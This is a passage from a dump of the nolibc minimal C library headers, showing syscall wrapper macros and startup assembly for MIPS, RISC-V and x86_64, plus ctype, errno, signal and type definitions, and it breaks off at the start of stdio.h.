\ 154 | \ 155 | __asm__ volatile ( \ 156 | "addiu $sp, $sp, -32\n" \ 157 | "syscall\n" \ 158 | "addiu $sp, $sp, 32\n" \ 159 | : "=r" (_num), "=r"(_arg4) \ 160 | : "0"(_num), \ 161 | "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4) \ 162 | : "memory", "cc", "at", "v1", "hi", "lo", \ 163 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 164 | ); \ 165 | _arg4 ? -_num : _num; \ 166 | }) 167 | 168 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 169 | ({ \ 170 | register long _num __asm__ ("v0") = (num); \ 171 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 172 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 173 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 174 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 175 | register long _arg5 = (long)(arg5); \ 176 | \ 177 | __asm__ volatile ( \ 178 | "addiu $sp, $sp, -32\n" \ 179 | "sw %7, 16($sp)\n" \ 180 | "syscall\n " \ 181 | "addiu $sp, $sp, 32\n" \ 182 | : "=r" (_num), "=r"(_arg4) \ 183 | : "0"(_num), \ 184 | "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5) \ 185 | : "memory", "cc", "at", "v1", "hi", "lo", \ 186 | "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "t8", "t9" \ 187 | ); \ 188 | _arg4 ? -_num : _num; \ 189 | }) 190 | 191 | /* startup code, note that it's called __start on MIPS */ 192 | __asm__ (".section .text\n" 193 | ".weak __start\n" 194 | ".set nomips16\n" 195 | ".set push\n" 196 | ".set noreorder\n" 197 | ".option pic0\n" 198 | ".ent __start\n" 199 | "__start:\n" 200 | "lw $a0,($sp)\n" // argc was in the stack 201 | "addiu $a1, $sp, 4\n" // argv = sp + 4 202 | "sll $a2, $a0, 2\n" // a2 = argc * 4 203 | "add $a2, $a2, $a1\n" // envp = argv + 4*argc ... 204 | "addiu $a2, $a2, 4\n" // ... + 4 205 | "li $t0, -8\n" 206 | "and $sp, $sp, $t0\n" // sp must be 8-byte aligned 207 | "addiu $sp,$sp,-16\n" // the callee expects to save a0..a3 there! 208 | "jal main\n" // main() returns the status code, we'll exit with it. 209 | "nop\n" // delayed slot 210 | "move $a0, $v0\n" // retrieve 32-bit exit code from v0 211 | "li $v0, 4001\n" // NR_exit == 4001 212 | "syscall\n" 213 | ".end __start\n" 214 | ".set pop\n" 215 | ""); 216 | 217 | #endif // _NOLIBC_ARCH_MIPS_H 218 | -------------------------------------------------------------------------------- /exp/nolibc/arch-riscv.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * RISCV (32 and 64) specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_RISCV_H 8 | #define _NOLIBC_ARCH_RISCV_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x10000 21 | 22 | struct sys_stat_struct { 23 | unsigned long st_dev; /* Device. */ 24 | unsigned long st_ino; /* File serial number. */ 25 | unsigned int st_mode; /* File mode. */ 26 | unsigned int st_nlink; /* Link count. */ 27 | unsigned int st_uid; /* User ID of the file's owner. */ 28 | unsigned int st_gid; /* Group ID of the file's group. */ 29 | unsigned long st_rdev; /* Device number, if device. */ 30 | unsigned long __pad1; 31 | long st_size; /* Size of file, in bytes. */ 32 | int st_blksize; /* Optimal block size for I/O. */ 33 | int __pad2; 34 | long st_blocks; /* Number 512-byte blocks allocated. */ 35 | long st_atime; /* Time of last access. */ 36 | unsigned long st_atime_nsec; 37 | long st_mtime; /* Time of last modification. */ 38 | unsigned long st_mtime_nsec; 39 | long st_ctime; /* Time of last status change. */ 40 | unsigned long st_ctime_nsec; 41 | unsigned int __unused4; 42 | unsigned int __unused5; 43 | }; 44 | 45 | #if __riscv_xlen == 64 46 | #define PTRLOG "3" 47 | #define SZREG "8" 48 | #elif __riscv_xlen == 32 49 | #define PTRLOG "2" 50 | #define SZREG "4" 51 | #endif 52 | 53 | /* Syscalls for RISCV : 54 | * - stack is 16-byte aligned 55 | * - syscall number is passed in a7 56 | * - arguments are in a0, a1, a2, a3, a4, a5 57 | * - the system call is performed by calling ecall 58 | * - syscall return comes in a0 59 | * - the arguments are cast to long and assigned into the target 60 | * registers which are then simply passed as registers to the asm code, 61 | * so that we don't have to experience issues with register constraints. 62 | * 63 | * On riscv, select() is not implemented so we have to use pselect6(). 64 | */ 65 | #define __ARCH_WANT_SYS_PSELECT6 66 | 67 | #define my_syscall0(num) \ 68 | ({ \ 69 | register long _num __asm__ ("a7") = (num); \ 70 | register long _arg1 __asm__ ("a0"); \ 71 | \ 72 | __asm__ volatile ( \ 73 | "ecall\n\t" \ 74 | : "=r"(_arg1) \ 75 | : "r"(_num) \ 76 | : "memory", "cc" \ 77 | ); \ 78 | _arg1; \ 79 | }) 80 | 81 | #define my_syscall1(num, arg1) \ 82 | ({ \ 83 | register long _num __asm__ ("a7") = (num); \ 84 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 85 | \ 86 | __asm__ volatile ( \ 87 | "ecall\n" \ 88 | : "+r"(_arg1) \ 89 | : "r"(_num) \ 90 | : "memory", "cc" \ 91 | ); \ 92 | _arg1; \ 93 | }) 94 | 95 | #define my_syscall2(num, arg1, arg2) \ 96 | ({ \ 97 | register long _num __asm__ ("a7") = (num); \ 98 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 99 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 100 | \ 101 | __asm__ volatile ( \ 102 | "ecall\n" \ 103 | : "+r"(_arg1) \ 104 | : "r"(_arg2), \ 105 | "r"(_num) \ 106 | : "memory", "cc" \ 107 | ); \ 108 | _arg1; \ 109 | }) 110 | 111 | #define my_syscall3(num, arg1, arg2, arg3) \ 112 | ({ \ 113 | register long _num __asm__ ("a7") = (num); \ 114 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 115 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 116 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 117 | \ 118 | __asm__ volatile ( \ 119 | "ecall\n\t" \ 120 | : "+r"(_arg1) \ 121 | : "r"(_arg2), "r"(_arg3), \ 122 | "r"(_num) \ 123 | : "memory", "cc" \ 124 | ); \ 125 | _arg1; \ 126 | }) 127 | 128 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 129 | ({ \ 130 | register long _num __asm__ ("a7") = (num); \ 131 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 132 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 133 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 134 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 135 | \ 136 | __asm__ volatile ( \ 137 | "ecall\n" \ 138 | : "+r"(_arg1) \ 139 | : "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 140 | "r"(_num) \ 141 | : "memory", "cc" \ 142 | ); \ 143 | _arg1; \ 144 | }) 145 | 146 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 147 | ({ \ 148 | register long _num __asm__ ("a7") = (num); \ 149 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 150 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 151 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 152 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 153 | register long _arg5 __asm__ ("a4") = (long)(arg5); \ 154 | \ 155 | __asm__ volatile ( \ 156 | "ecall\n" \ 157 | : "+r"(_arg1) \ 158 | : "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 159 | "r"(_num) \ 160 | : "memory", "cc" \ 161 | ); \ 162 | _arg1; \ 163 | }) 164 | 165 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 166 | ({ \ 167 | register long _num __asm__ ("a7") = (num); \ 168 | register long _arg1 __asm__ ("a0") = (long)(arg1); \ 169 | register long _arg2 __asm__ ("a1") = (long)(arg2); \ 170 | register long _arg3 __asm__ ("a2") = (long)(arg3); \ 171 | register long _arg4 __asm__ ("a3") = (long)(arg4); \ 172 | register long _arg5 __asm__ ("a4") = (long)(arg5); \ 173 | register long _arg6 __asm__ ("a5") = (long)(arg6); \ 174 | \ 175 | __asm__ volatile ( \ 176 | "ecall\n" \ 177 | : "+r"(_arg1) \ 178 | : "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), "r"(_arg6), \ 179 | "r"(_num) \ 180 | : "memory", "cc" \ 181 | ); \ 182 | _arg1; \ 183 | }) 184 | 185 | /* startup code */ 186 | __asm__ (".section .text\n" 187 | ".weak _start\n" 188 | "_start:\n" 189 | ".option push\n" 190 | ".option norelax\n" 191 | "lla gp, __global_pointer$\n" 192 | ".option pop\n" 193 | "lw a0, 0(sp)\n" // argc (a0) was in the stack 194 | "add a1, sp, "SZREG"\n" // argv (a1) = sp 195 | "slli a2, a0, "PTRLOG"\n" // envp (a2) = SZREG*argc ... 196 | "add a2, a2, "SZREG"\n" // + SZREG (skip null) 197 | "add a2,a2,a1\n" // + argv 198 | "andi sp,a1,-16\n" // sp must be 16-byte aligned 199 | "call main\n" // main() returns the status code, we'll exit with it. 200 | "li a7, 93\n" // NR_exit == 93 201 | "ecall\n" 202 | ""); 203 | 204 | #endif // _NOLIBC_ARCH_RISCV_H 205 | -------------------------------------------------------------------------------- /exp/nolibc/arch-x86_64.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * x86_64 specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_X86_64_H 8 | #define _NOLIBC_ARCH_X86_64_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x10000 21 | 22 | /* The struct returned by the stat() syscall, equivalent to stat64(). The 23 | * syscall returns 116 bytes and stops in the middle of __unused. 24 | */ 25 | struct sys_stat_struct { 26 | unsigned long st_dev; 27 | unsigned long st_ino; 28 | unsigned long st_nlink; 29 | unsigned int st_mode; 30 | unsigned int st_uid; 31 | 32 | unsigned int st_gid; 33 | unsigned int __pad0; 34 | unsigned long st_rdev; 35 | long st_size; 36 | long st_blksize; 37 | 38 | long st_blocks; 39 | unsigned long st_atime; 40 | unsigned long st_atime_nsec; 41 | unsigned long st_mtime; 42 | 43 | unsigned long st_mtime_nsec; 44 | unsigned long st_ctime; 45 | unsigned long st_ctime_nsec; 46 | long __unused[3]; 47 | }; 48 | 49 | /* Syscalls for x86_64 : 50 | * - registers are 64-bit 51 | * - syscall number is passed in rax 52 | * - arguments are in rdi, rsi, rdx, r10, r8, r9 respectively 53 | * - the system call is performed by calling the syscall instruction 54 | * - syscall return comes in rax 55 | * - rcx and r11 are clobbered, others are preserved. 56 | * - the arguments are cast to long and assigned into the target registers 57 | * which are then simply passed as registers to the asm code, so that we 58 | * don't have to experience issues with register constraints. 59 | * - the syscall number is always specified last in order to allow to force 60 | * some registers before (gcc refuses a %-register at the last position). 61 | * - see also x86-64 ABI section A.2 AMD64 Linux Kernel Conventions, A.2.1 62 | * Calling Conventions. 63 | * 64 | * Link x86-64 ABI: https://gitlab.com/x86-psABIs/x86-64-ABI/-/wikis/home 65 | * 66 | */ 67 | 68 | #define my_syscall0(num) \ 69 | ({ \ 70 | long _ret; \ 71 | register long _num __asm__ ("rax") = (num); \ 72 | \ 73 | __asm__ volatile ( \ 74 | "syscall\n" \ 75 | : "=a"(_ret) \ 76 | : "0"(_num) \ 77 | : "rcx", "r11", "memory", "cc" \ 78 | ); \ 79 | _ret; \ 80 | }) 81 | 82 | #define my_syscall1(num, arg1) \ 83 | ({ \ 84 | long _ret; \ 85 | register long _num __asm__ ("rax") = (num); \ 86 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 87 | \ 88 | __asm__ volatile ( \ 89 | "syscall\n" \ 90 | : "=a"(_ret) \ 91 | : "r"(_arg1), \ 92 | "0"(_num) \ 93 | : "rcx", "r11", "memory", "cc" \ 94 | ); \ 95 | _ret; \ 96 | }) 97 | 98 | #define my_syscall2(num, arg1, arg2) \ 99 | ({ \ 100 | long _ret; \ 101 | register long _num __asm__ ("rax") = (num); \ 102 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 103 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 104 | \ 105 | __asm__ volatile ( \ 106 | "syscall\n" \ 107 | : "=a"(_ret) \ 108 | : "r"(_arg1), "r"(_arg2), \ 109 | "0"(_num) \ 110 | : "rcx", "r11", "memory", "cc" \ 111 | ); \ 112 | _ret; \ 113 | }) 114 | 115 | #define my_syscall3(num, arg1, arg2, arg3) \ 116 | ({ \ 117 | long _ret; \ 118 | register long _num __asm__ ("rax") = (num); \ 119 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 120 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 121 | register long _arg3 __asm__ ("rdx") = (long)(arg3); \ 122 | \ 123 | __asm__ volatile ( \ 124 | "syscall\n" \ 125 | : "=a"(_ret) \ 126 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 127 | "0"(_num) \ 128 | : "rcx", "r11", "memory", "cc" \ 129 | ); \ 130 | _ret; \ 131 | }) 132 | 133 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 134 | ({ \ 135 | long _ret; \ 136 | register long _num __asm__ ("rax") = (num); \ 137 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 138 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 139 | register long _arg3 __asm__ ("rdx") = (long)(arg3); \ 140 | register long _arg4 __asm__ ("r10") = (long)(arg4); \ 141 | \ 142 | __asm__ volatile ( \ 143 | "syscall\n" \ 144 | : "=a"(_ret) \ 145 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 146 | "0"(_num) \ 147 | : "rcx", "r11", "memory", "cc" \ 148 | ); \ 149 | _ret; \ 150 | }) 151 | 152 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 153 | ({ \ 154 | long _ret; \ 155 | register long _num __asm__ ("rax") = (num); \ 156 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 157 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 158 | register long _arg3 __asm__ ("rdx") = (long)(arg3); \ 159 | register long _arg4 __asm__ ("r10") = (long)(arg4); \ 160 | register long _arg5 __asm__ ("r8") = (long)(arg5); \ 161 | \ 162 | __asm__ volatile ( \ 163 | "syscall\n" \ 164 | : "=a"(_ret) \ 165 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 166 | "0"(_num) \ 167 | : "rcx", "r11", "memory", "cc" \ 168 | ); \ 169 | _ret; \ 170 | }) 171 | 172 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 173 | ({ \ 174 | long _ret; \ 175 | register long _num __asm__ ("rax") = (num); \ 176 | register long _arg1 __asm__ ("rdi") = (long)(arg1); \ 177 | register long _arg2 __asm__ ("rsi") = (long)(arg2); \ 178 | register long _arg3 __asm__ ("rdx") = (long)(arg3); \ 179 | register long _arg4 __asm__ ("r10") = (long)(arg4); \ 180 | register long _arg5 __asm__ ("r8") = (long)(arg5); \ 181 | register long _arg6 __asm__ ("r9") = (long)(arg6); \ 182 | \ 183 | __asm__ volatile ( \ 184 | "syscall\n" \ 185 | : "=a"(_ret) \ 186 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 187 | "r"(_arg6), "0"(_num) \ 188 | : "rcx", "r11", "memory", "cc" \ 189 | ); \ 190 | _ret; \ 191 | }) 192 | 193 | /* startup code */ 194 | /* 195 | * x86-64 System V ABI mandates: 196 | * 1) %rsp must be 16-byte aligned right before the function call. 197 | * 2) The deepest stack frame should be zero (the %rbp). 198 | * 199 | */ 200 | __asm__ (".section .text\n" 201 | ".weak _start\n" 202 | "_start:\n" 203 | "pop %rdi\n" // argc (first arg, %rdi) 204 | "mov %rsp, %rsi\n" // argv[] (second arg, %rsi) 205 | "lea 8(%rsi,%rdi,8),%rdx\n" // then a NULL then envp (third arg, %rdx) 206 | "xor %ebp, %ebp\n" // zero the stack frame 207 | "and $-16, %rsp\n" // x86 ABI : esp must be 16-byte aligned before call 208 | "call main\n" // main() returns the status code, we'll exit with it. 209 | "mov %eax, %edi\n" // retrieve exit code (32 bit) 210 | "mov $60, %eax\n" // NR_exit == 60 211 | "syscall\n" // really exit 212 | "hlt\n" // ensure it does not return 213 | ""); 214 | 215 | #endif // _NOLIBC_ARCH_X86_64_H 216 | -------------------------------------------------------------------------------- /exp/nolibc/arch.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Copyright (C) 2017-2022 Willy Tarreau 4 | */ 5 | 6 | /* Below comes the architecture-specific code. For each architecture, we have 7 | * the syscall declarations and the _start code definition. This is the only 8 | * global part. On all architectures the kernel puts everything in the stack 9 | * before jumping to _start just above us, without any return address (_start 10 | * is not a function but an entry pint). So at the stack pointer we find argc. 11 | * Then argv[] begins, and ends at the first NULL. Then we have envp which 12 | * starts and ends with a NULL as well. So envp=argv+argc+1. 13 | */ 14 | 15 | #ifndef _NOLIBC_ARCH_H 16 | #define _NOLIBC_ARCH_H 17 | 18 | #if defined(__x86_64__) 19 | #include "arch-x86_64.h" 20 | #elif defined(__i386__) || defined(__i486__) || defined(__i586__) || defined(__i686__) 21 | #include "arch-i386.h" 22 | #elif defined(__ARM_EABI__) 23 | #include "arch-arm.h" 24 | #elif defined(__aarch64__) 25 | #include "arch-aarch64.h" 26 | #elif defined(__mips__) && defined(_ABIO32) 27 | #include "arch-mips.h" 28 | #elif defined(__riscv) 29 | #include "arch-riscv.h" 30 | #endif 31 | 32 | #endif /* _NOLIBC_ARCH_H */ 33 | -------------------------------------------------------------------------------- /exp/nolibc/ctype.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * ctype function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_CTYPE_H 8 | #define _NOLIBC_CTYPE_H 9 | 10 | #include "std.h" 11 | 12 | /* 13 | * As much as possible, please keep functions alphabetically sorted. 14 | */ 15 | 16 | static __attribute__((unused)) 17 | int isascii(int c) 18 | { 19 | /* 0x00..0x7f */ 20 | return (unsigned int)c <= 0x7f; 21 | } 22 | 23 | static __attribute__((unused)) 24 | int isblank(int c) 25 | { 26 | return c == '\t' || c == ' '; 27 | } 28 | 29 | static __attribute__((unused)) 30 | int iscntrl(int c) 31 | { 32 | /* 0x00..0x1f, 0x7f */ 33 | return (unsigned int)c < 0x20 || c == 0x7f; 34 | } 35 | 36 | static __attribute__((unused)) 37 | int isdigit(int c) 38 | { 39 | return (unsigned int)(c - '0') < 10; 40 | } 41 | 42 | static __attribute__((unused)) 43 | int isgraph(int c) 44 | { 45 | /* 0x21..0x7e */ 46 | return (unsigned int)(c - 0x21) < 0x5e; 47 | } 48 | 49 | static __attribute__((unused)) 50 | int islower(int c) 51 | { 52 | return (unsigned int)(c - 'a') < 26; 53 | } 54 | 55 | static __attribute__((unused)) 56 | int isprint(int c) 57 | { 58 | /* 0x20..0x7e */ 59 | return (unsigned int)(c - 0x20) < 0x5f; 60 | } 61 | 62 | static __attribute__((unused)) 63 | int isspace(int c) 64 | { 65 | /* \t is 0x9, \n is 0xA, \v is 0xB, \f is 0xC, \r is 0xD */ 66 | return ((unsigned int)c == ' ') || (unsigned int)(c - 0x09) < 5; 67 | } 68 | 69 | static __attribute__((unused)) 70 | int isupper(int c) 71 | { 72 | return (unsigned int)(c - 'A') < 26; 73 | } 74 | 75 | static __attribute__((unused)) 76 | int isxdigit(int c) 77 | { 78 | return isdigit(c) || (unsigned int)(c - 'A') < 6 || (unsigned int)(c - 'a') < 6; 79 | } 80 | 81 | static __attribute__((unused)) 82 | int isalpha(int c) 83 | { 84 | return islower(c) || isupper(c); 85 | } 86 | 87 | static __attribute__((unused)) 88 | int isalnum(int c) 89 | { 90 | return isalpha(c) || isdigit(c); 91 | } 92 | 93 | static __attribute__((unused)) 94 | int ispunct(int c) 95 | { 96 | return isgraph(c) && !isalnum(c); 97 | } 98 | 99 | /* make sure to include all global symbols */ 100 | #include "nolibc.h" 101 | 102 | #endif /* _NOLIBC_CTYPE_H */ 103 | -------------------------------------------------------------------------------- /exp/nolibc/errno.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Minimal errno definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ERRNO_H 8 | #define _NOLIBC_ERRNO_H 9 | 10 | #include 11 | 12 | /* this way it will be removed if unused */ 13 | static int errno; 14 | 15 | #ifndef NOLIBC_IGNORE_ERRNO 16 | #define SET_ERRNO(v) do { errno = (v); } while (0) 17 | #else 18 | #define SET_ERRNO(v) do { } while (0) 19 | #endif 20 | 21 | 22 | /* errno codes all ensure that they will not conflict with a valid pointer 23 | * because they all correspond to the highest addressable memory page. 24 | */ 25 | #define MAX_ERRNO 4095 26 | 27 | /* make sure to include all global symbols */ 28 | #include "nolibc.h" 29 | 30 | #endif /* _NOLIBC_ERRNO_H */ 31 | -------------------------------------------------------------------------------- /exp/nolibc/nolibc.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* nolibc.h 3 | * Copyright (C) 2017-2018 Willy Tarreau 4 | */ 5 | 6 | /* 7 | * This file is designed to be used as a libc alternative for minimal programs 8 | * with very limited requirements. It consists of a small number of syscall and 9 | * type definitions, and the minimal startup code needed to call main(). 10 | * All syscalls are declared as static functions so that they can be optimized 11 | * away by the compiler when not used. 12 | * 13 | * Syscalls are split into 3 levels: 14 | * - The lower level is the arch-specific syscall() definition, consisting in 15 | * assembly code in compound expressions. These are called my_syscall0() to 16 | * my_syscall6() depending on the number of arguments. The MIPS 17 | * implementation is limited to 5 arguments. All input arguments are cast 18 | * to a long stored in a register. These expressions always return the 19 | * syscall's return value as a signed long value which is often either a 20 | * pointer or the negated errno value. 21 | * 22 | * - The second level is mostly architecture-independent. It is made of 23 | * static functions called sys_() which rely on my_syscallN() 24 | * depending on the syscall definition. These functions are responsible 25 | * for exposing the appropriate types for the syscall arguments (int, 26 | * pointers, etc) and for setting the appropriate return type (often int). 27 | * A few of them are architecture-specific because the syscalls are not all 28 | * mapped exactly the same among architectures. For example, some archs do 29 | * not implement select() and need pselect6() instead, so the sys_select() 30 | * function will have to abstract this. 31 | * 32 | * - The third level is the libc call definition. It exposes the lower raw 33 | * sys_() calls in a way that looks like what a libc usually does, 34 | * takes care of specific input values, and of setting errno upon error. 35 | * There can be minor variations compared to standard libc calls. For 36 | * example the open() call always takes 3 args here. 37 | * 38 | * The errno variable is declared static and unused. This way it can be 39 | * optimized away if not used. However this means that a program made of 40 | * multiple C files may observe different errno values (one per C file). For 41 | * the type of programs this project targets it usually is not a problem. The 42 | * resulting program may even be reduced by defining the NOLIBC_IGNORE_ERRNO 43 | * macro, in which case the errno value will never be assigned. 44 | * 45 | * Some stdint-like integer types are defined. These are valid on all currently 46 | * supported architectures, because signs are enforced, ints are assumed to be 47 | * 32 bits, longs the size of a pointer and long long 64 bits. If more 48 | * architectures have to be supported, this may need to be adapted. 49 | * 50 | * Some macro definitions like the O_* values passed to open(), and some 51 | * structures like the sys_stat struct depend on the architecture. 52 | * 53 | * The definitions start with the architecture-specific parts, which are picked 54 | * based on what the compiler knows about the target architecture, and are 55 | * completed with the generic code. Since it is the compiler which sets the 56 | * target architecture, cross-compiling normally works out of the box without 57 | * having to specify anything. 58 | * 59 | * Finally some very common libc-level functions are provided. It is the case 60 | * for a few functions usually found in string.h, ctype.h, or stdlib.h. 61 | * 62 | * The nolibc.h file is only a convenient entry point which includes all other 63 | * files. It also defines the NOLIBC macro, so that it is possible for a 64 | * program to check this macro to know if it is being built against and decide 65 | * to disable some features or simply not to include some standard libc files. 66 | * 67 | * A simple static executable may be built this way : 68 | * $ gcc -fno-asynchronous-unwind-tables -fno-ident -s -Os -nostdlib \ 69 | * -static -include nolibc.h -o hello hello.c -lgcc 70 | * 71 | * Simple programs meant to be reasonably portable to various libc and using 72 | * only a few common includes, may also be built by simply making the include 73 | * path point to the nolibc directory: 74 | * $ gcc -fno-asynchronous-unwind-tables -fno-ident -s -Os -nostdlib \ 75 | * -I../nolibc -o hello hello.c -lgcc 76 | * 77 | * The available standard (but limited) include files are: 78 | * ctype.h, errno.h, signal.h, stdio.h, stdlib.h, string.h, time.h 79 | * 80 | * In addition, the following ones are expected to be provided by the compiler: 81 | * float.h, stdarg.h, stddef.h 82 | * 83 | * The following ones which are part to the C standard are not provided: 84 | * assert.h, locale.h, math.h, setjmp.h, limits.h 85 | * 86 | * A very useful calling convention table may be found here : 87 | * http://man7.org/linux/man-pages/man2/syscall.2.html 88 | * 89 | * This doc is quite convenient though not necessarily up to date : 90 | * https://w3challs.com/syscalls/ 91 | * 92 | */ 93 | #ifndef _NOLIBC_H 94 | #define _NOLIBC_H 95 | 96 | #include "std.h" 97 | #include "arch.h" 98 | #include "types.h" 99 | #include "sys.h" 100 | #include "ctype.h" 101 | #include "signal.h" 102 | #include "stdio.h" 103 | #include "stdlib.h" 104 | #include "string.h" 105 | #include "time.h" 106 | #include "unistd.h" 107 | 108 | /* Used by programs to avoid std includes */ 109 | #define NOLIBC 110 | 111 | #endif /* _NOLIBC_H */ 112 | -------------------------------------------------------------------------------- /exp/nolibc/signal.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * signal function definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_SIGNAL_H 8 | #define _NOLIBC_SIGNAL_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | 15 | /* This one is not marked static as it's needed by libgcc for divide by zero */ 16 | __attribute__((weak,unused,section(".text.nolibc_raise"))) 17 | int raise(int signal) 18 | { 19 | return sys_kill(sys_getpid(), signal); 20 | } 21 | 22 | /* make sure to include all global symbols */ 23 | #include "nolibc.h" 24 | 25 | #endif /* _NOLIBC_SIGNAL_H */ 26 | -------------------------------------------------------------------------------- /exp/nolibc/std.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Standard definitions and types for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STD_H 8 | #define _NOLIBC_STD_H 9 | 10 | /* Declare a few quite common macros and types that usually are in stdlib.h, 11 | * stdint.h, ctype.h, unistd.h and a few other common locations. Please place 12 | * integer type definitions and generic macros here, but avoid OS-specific and 13 | * syscall-specific stuff, as this file is expected to be included very early. 14 | */ 15 | 16 | /* note: may already be defined */ 17 | #ifndef NULL 18 | #define NULL ((void *)0) 19 | #endif 20 | 21 | /* stdint types */ 22 | typedef unsigned char uint8_t; 23 | typedef signed char int8_t; 24 | typedef unsigned short uint16_t; 25 | typedef signed short int16_t; 26 | typedef unsigned int uint32_t; 27 | typedef signed int int32_t; 28 | typedef unsigned long long uint64_t; 29 | typedef signed long long int64_t; 30 | typedef unsigned long size_t; 31 | typedef signed long ssize_t; 32 | typedef unsigned long uintptr_t; 33 | typedef signed long intptr_t; 34 | typedef signed long ptrdiff_t; 35 | 36 | /* those are commonly provided by sys/types.h */ 37 | typedef unsigned int dev_t; 38 | typedef unsigned long ino_t; 39 | typedef unsigned int mode_t; 40 | typedef signed int pid_t; 41 | typedef unsigned int uid_t; 42 | typedef unsigned int gid_t; 43 | typedef unsigned long nlink_t; 44 | typedef signed long off_t; 45 | typedef signed long blksize_t; 46 | typedef signed long blkcnt_t; 47 | typedef signed long time_t; 48 | 49 | #endif /* _NOLIBC_STD_H */ 50 | -------------------------------------------------------------------------------- /exp/nolibc/stdio.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * minimal stdio function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STDIO_H 8 | #define _NOLIBC_STDIO_H 9 | 10 | #include 11 | 12 | #include "std.h" 13 | #include "arch.h" 14 | #include "errno.h" 15 | #include "types.h" 16 | #include "sys.h" 17 | #include "stdlib.h" 18 | #include "string.h" 19 | 20 | #ifndef 